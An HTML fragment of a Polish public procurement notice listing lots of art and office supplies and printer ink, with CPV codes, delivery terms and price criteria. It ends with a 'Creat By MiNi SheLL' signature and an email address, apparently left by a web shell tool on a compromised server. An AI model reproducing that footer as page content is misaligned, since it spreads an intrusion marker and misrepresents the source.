<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.00.00-2, 32.32.12.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup i dostawa materiałów papierniczo - biurowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 ołówki grafitowe mix kolorów - 8 opak.
2 temperówki na cienkie i grube kredki	 - 6 opak.
3 gumki zestaw 24 szt. - 7 opak.
4 kredki świecowe po 6 szt. w pudełku, różne kolory - 5 opak.
5 kredki drewniane ok. 140 szt. w opakowaniu w 12 kolorach - 6 opak.
6 farby plakatowe 12 kolorów pojemność 20ml - 10 kpl.
7 farby akwarelowe 12 kolorów , pędzelek - 10 opak.
8 pędzle z gąbki - 9 opak.
9 zestaw 30 pędzli z naturalnego włosia o wielu rozmiarach rozm.;3,4,6,8,10,12 - 4 opak.
10 plastelina w laseczkach	Plastelina nietoksyczna i odporna na zabrudzenia - 4 opak.
11 glina samoutwardzalna biała - 2 opak.
12 glina samoutwardzalna ceglasta - 2 opak.
13 ciastokreacja 6 dużych kubków masy plastycznej z foremkami - 1 zest.
14 12 flamastrów w różnych kolorach	Zawartość opakowania - 7 opak.
15 zestaw nożyczek - 6 opak.
16 klej w sztyfcie  20 g - 113 szt.
17 brystol A1   kolorowy mix	 - 4 opak.
18 brystol A1   biały - 4 opak.
19 ryza białego papieru szt. 500  - 19 opak.
20 ryza kolorowego papieru mix 100O - 9 opak.
21 papier kolorowy - 4 zeszyty.
22 segregator duży - 6 szt.
23 skoroszyt - 13 opak.
24 teczka biała z gumką - 4 szt.
26 karton kolorowy A4 15 arkuszy w opakowaniu - 5 opak.
27 taśma klejąca szer. 15mm dł. 10 m ilość 10 rolek w opakowaniu - 9 opak.
28 taśma dwustronna szer. 38 mm dł. 2,75 m - 14 szt.
29 bibuła karbowana zebra - 3 szt.
30 bibuła karbowana tygrys	wym. 200 x 50 cm - 3 szt.
31 bibuła karbowana żyrafa	wym. 200 x 50 cm - 3 szt.
32 bibuła karbowana żółw	wym. 200 x 50 cm - 3 szt.
33 bibuła karbowana pantera	wym. 200 x 50 cm -3 szt.
34 bibuła karbowana srebrna wym. 200 x 50 cm -2 szt.
35 bibuła karbowana  złota	wym. 200 x 50 cm -2 szt.
36bibuła karbowana mix kolorowa w opakowaniu 15 szt.	wym. 200 x 50 cm - 7 opak.
37 krepina w kratkę 10 rolek w opak.	wym. 50 x 250 cm - 3 opak.
38 krepina w paski i kropki 8 rolek w opakowaniu 8 rolek wym. 250 x 50 cm - 3 opak.
39 filc - komplet 10 kolorów  w opakowaniu - 3 opak
40 flizelina dekoracyjna 10 kolorów, 10 arkuszy w opakowaniu  - 3 opak.
41 tektura falista 10 kolorów po 10 arkuszy - 3 opak.
42 tektury ozdobne paski 10 arkuszy	Format 23 x 35 cm  - 2 opak.
43 tektury ozdobne kropki 10 arkuszy	Format 23 x 35 cm  - 2 opak.
44 tektury ozdobne skóra zwierząt - 2 opak.
45 papier szary A2 20 arkuszy - 2 opak.
46 papier plaster miodu szt. 5 - 2 opak.
47 zszywacz z wysuwanym ramieniem	 - 2 szt.
48 druciki kreatywne szt. 100 - 2 opak.
49 pomadki do malowania twarzy 6 kolorów - 3 opak.
50 tkanina na stroje komplet - 15 koszulek - 2 opak.
51 rafa naturalna mix 10 kolorów - 3 opak.
52 pióra duże ok.szt. 60 - 2 zest.
53 pióra indiańskie ok.szt. 120 - 2 opak.
54 opakowanie z pomponami  - 1 opak.
55 maski do malowania - 1 opak.
56 papierowe twarze etniczne szt. 50 	 - 1 opak.
57 brokaty - zestaw 10 butelek - 1 zestaw
58 tkaniny na stroje turkus - 2 rolki
59 tkaniny na stroje czerwona - 2 rolki
60 tkaniny na stroje żółta - 2 rolki
61 farby do tkanin 6 kolorów	 - 1 kpl.
62 tkanina na stroje zielona	 - 1 rolka
63 tkanina na stroje jasnobrązowa - 1 rolka
64 tkaniny na stroje biała - 1 rolka
65 krepina tęczowa - 1 kpl.
66 krepina w gwiazdy mix - 1 kpl.
67 krepiny metalizowane - 2 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.97.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakup i dostawa materiałów eksploatacyjnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 tusz do drukarki nashuatec DSm516pf - 1 szt.
2 tusz do drukarki nashuatec 1305f - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com